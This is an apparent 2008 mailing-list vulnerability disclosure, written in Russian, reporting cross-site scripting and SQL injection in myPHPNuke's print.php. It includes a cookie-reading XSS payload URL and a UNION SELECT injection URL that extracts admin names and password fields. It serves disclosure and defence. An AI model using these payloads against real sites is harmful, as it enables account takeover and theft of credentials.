Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

XSS and Data Manipulation attacks found in CMS PHPCart.

[Exploit] Invision Power Board <= 2.3.5 Multiple Vulnerabilities

[Advisory]  Invision Power Board <= 2.3.5 Multiple Vulnerabilities and Security Bypass

Vulnerabilities in FeedBurner FeedSmith for WordPress

From:	MustLive <mustlive_(at)_websecurity.com.ua>
Date:	01.09.2008
Subject:	XSS and SQL Injection vulnerabilities in myPHPNuke

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною Cross-Site Scripting и SQL Injection уязвимостях в системе myPHPNuke.

XSS:

http://site/print.php?sid=%3CBODY%20onload=alert(document.
cookie)%3E

SQL Injection:

http://site/print.php?sid=-1%20union%20select%20null,null,aid,pwd,
null,null%20from%20mpn_authors%20limit%200,1

Уязвимы версии до myPHPNuke 1.8.8_8rc2 (а в последней версии системы возможна ограниченная SQL Injection атака).

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/2391/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua